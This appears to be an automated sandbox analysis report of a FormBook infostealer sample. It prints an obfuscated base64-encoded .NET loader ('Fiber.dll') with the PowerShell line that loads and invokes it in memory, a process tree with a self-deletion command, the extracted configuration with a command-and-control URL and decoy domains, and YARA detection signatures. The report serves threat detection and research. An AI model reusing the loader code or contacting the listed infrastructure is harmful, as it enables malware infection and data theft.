uQXR0cmlidXRlAFlhbm9BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBTZXRWYWx1ZQBhZGRfUmVzb3VyY2VSZXNvbHZlAGdldF9TaXplAGJ1ZmZlclNpemUAU2l6ZU9mAHN0YXJ0dXBfcmVnAE5ld0xhdGVCaW5kaW5nAHNldF9FbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcARG93bmxvYWRTdHJpbmcAQ29tcGFyZVN0cmluZwBUb1N0cmluZwBSZWZyZXNoAEdldEZ1bGxQYXRoAEdldEZvbGRlclBhdGgAbGVuZ3RoAEFzeW5jQ2FsbGJhY2sARGVsZWdhdGVDYWxsYmFjawBNYXJzaGFsAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABMYXRlQ2FsbABGaWJlci5kbGwAS2lsbABzZXRfU2VjdXJpdHlQcm90b2NvbABHZXRNYW5pZmVzdFJlc291cmNlU3RyZWFtAERlZmxhdGVTdHJlYW0AQ3J5cHRvU3RyZWFtAE1lbW9yeVN0cmVhbQBTeXN0ZW0AU3ltbWV0cmljQWxnb3JpdGhtAFJhbmRvbQBJQ3J5cHRvVHJhbnNmb3JtAEJvb2xlYW4AYnl0ZXNXcml0dGVuAEFwcERvbWFpbgBnZXRfQ3VycmVudERvbWFpbgBHZXRGaWxlTmFtZVdpdGhvdXRFeHRlbnNpb24AVmVyc2lvbgBTeXN0ZW0uSU8uQ29tcHJlc3Npb24AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AcHJvY2Vzc0luZm9ybWF0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBJbnRlcm4AQ29weVRvAEZpbGVJbmZvAEN1bHR1cmVJbmZvAEZpbGVTeXN0ZW1JbmZvAHN0YXJ0dXBJbmZvAHNldF9TdGFydEluZm8AUHJvY2Vzc1N0YXJ0SW5mbwBEaXJlY3RvcnlJbmZvAFplcm8Ac3RhcnR1cABTeXN0ZW0uTGlucQBGaWJlcgBERVNDcnlwdG9TZXJ2aWNlUHJvdmlkZXIAU3BlY2lhbEZvbGRlcgBCdWZmZXIAYnVmZmVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBSZXNvbHZlRXZlbnRIYW5kbGVyAGdldF9Vc2VyAEN1cnJlbnRVc2VyAFRvR2VuZXJpY1BhcmFtZXRlcgBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBCaXRDb252ZXJ0ZXIAZ2V0X0NvbXB1dGVyAE15Q29tcHV0ZXIAQ2xlYXJQcm9qZWN0RXJyb3IAU2V0UHJvamVjdEVycm9yAEFjdGl2YXRvcgAuY3RvcgAuY2N0b3IAQ3JlYXRlRGVjcnlwdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBGaWJlci5NeS5SZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAaW5oZXJpdEhhbmRsZXMAR2V0RmlsZXMAR2V0TWFuaWZlc3RSZXNvdXJjZU5hbWVzAEdldFZhbHVlTmFtZXMAdGhyZWFkQXR0cmlidXRlcwBwcm9jZXNzQXR0cmlidXRlcwBHZXRCeXRlcwBjcmVhdGlvbkZsYWdzAFN0cmluZ3MAZ2V0X1NldHRpbmdzAE15U2V0dGluZ3MAUmVzb2x2ZUV2ZW50QXJncwBSZWZlcmVuY2VFcXVhbHMAVG9vbHMAQ29udGFpbnMAQ29udmVyc2lvbnMAUnVudGltZUhlbHBlcnMAT3BlcmF0b3JzAGhQcm9jZXNzAHByb2Nlc3MAR2V0UHJvY0FkZHJlc3MAYmFzZUFkZHJlc3MAYWRkcmVzcwBzZXRfQXJndW1lbnRzAEV4aXN0cwBDb25jYXQARm9ybWF0AENyZWF0ZU9iamVjdABSZWxlYXNlQ29tT2JqZWN0AE15UHJvamVjdABwcm90ZWN0AExhdGVHZXQAU3lzdGVtLk5ldABMYXRlU2V0AGdldF9EZWZhdWx0AElBc3luY1Jlc3VsdABEZWxlZ2F0ZUFzeW5jUmVzdWx0AFdlYkNsaWVudABFbnZpcm9ubWVudABlbnZpcm9ubWVudABTdGFydABDb252ZXJ0AE5leHQAU3lzdGVtLlRleHQAY29udGV4dABGaWJlci5NeQBUb0FycmF5AFRvQ2hhckFycmF5AE9wZW5TdWJLZXkAUmVnaXN0cnlLZXkAU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeQBnZXRfQXNzZW1ibHkAZ2V0X1JlcXVlc3RpbmdBc3NlbWJseQBHZXRFeGVjdXRpbmdBc3NlbWJseQBBbnkAQmxvY2tDb3B5AGN1cnJlbnREaXJlY3RvcnkAUmVnaXN0cnkAb3BfRXF1YWxpdHkARW1wdHkATXlTZXR0aW5nc1Byb3BlcnR5AAAf87L1n/ea+Z/7jv3Q/1IBZwN3BWkHfQl4C28Naw9jAQvtxu8I8dnz3PXcAQPujQEN743UY/MO9d73hfnbAQPzlwEL1kL1DggF+Yf7yAED9ZIBC+/Y1DLWRvXc1eYBA/SQARHvsPGyDAnQZ/e4+dH7vNg+AQP0jQER0in13Pe43+XeTv3W/yogkQED7ocBEQoL8+f5hwQB3+TZHicCA/wBA/WCAQvz3PUM1eb50vuhAQPvwQER8gn03/a3+Ln60/wF/gUAKQED8sEBEdY09d3Wathp+4H9DtkfJLQBA/DLARHRQ/bN+Nrc5fzX2zAAKwI3AQPx3QED8cMBA/GuAQn02/aB+Jv6iAEL9N/22fiP+pn8jgFz8LLyyfSp9qD4kPqV/Jn+kAB2AnAEWQZUCHAKeAx5DmoQfBIgFCcWSxhOGnIccx57IE4iVCR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AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAHDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] (' ??v?}???@+@ ?@@ ??v?}??.onis4*?*?#:?v4*?*?#:?k!}( }il!}( }.8*??(ws8*??(rf4*?*?#:?4*?*?#:??? }??+?p ??v?}?? ??v?}???*(??@*?','1No1me_Startup','2No3me_3tartup')) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • svchost.exe (PID: 5896 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmmon32.exe (PID: 5912 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
            • cmd.exe (PID: 5936 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.krmq9w.cfd/g94s/"], "decoy": ["electorhome.com", "produtosmult.com", "csfelier.com", "wecarecats.com", "ohayouai.com", "rueduvan.cfd", "jay2oh.cfd", "hyperpigmentation-91528.bond", "tycoorabe.best", "trinityxtore.com", "itko9j.cfd", "wumpininews.net", "hyundaievtrucks.com", "mensaoxyz.xyz", "youvebeenjuaned.com", "apinspect.net", "skonehenge.com", "93txm.live", "lajzznhk.cfd", "gprcdgbp.cfd", "hawckxvk.cfd", "vrescjta.xyz", "brezop.xyz", "xnmshx.cfd", "rduyisqy.cfd", "dhaozermbloscvur.com", "baroevent.com", "iamthe.app", "yusqfwfl.cfd", "eeqihhgoqi.com", "suitahoukagodayjiko.com", "amyloujennings.com", "kohtao.online", "qjcl6y.com", "chargezready.com", "lojq5vh.buzz", "yufqjkcd.cfd", "ola1919.com", "klikjackpot4.store", "neurivamind.com", "yprblqkk.cfd", "sapienyoga.com", "justinwdong.com", "homesfefe.online", "tinnitustreatment.xyz", "styledinfaith.com", "ngl1aw.cfd", "crabsaw.store", "yl0004.xyz", "qsmdrkjw.cfd", "124jm.com", "tbltechnerds.xyz", "drekrowr.cfd", "ogtvmiyc.cfd", "beijingchineserestaurantil.com", "cpbooster.cyou", "drivercode.work", "rixiojjl.cfd", "latamgradoenenfermeria.com", "beyonddocs.site", "eui6i3.cfd", "6neizr.cfd", "chuji-7.xyz", "6srmo6sg.top"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          3.2.svchost.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
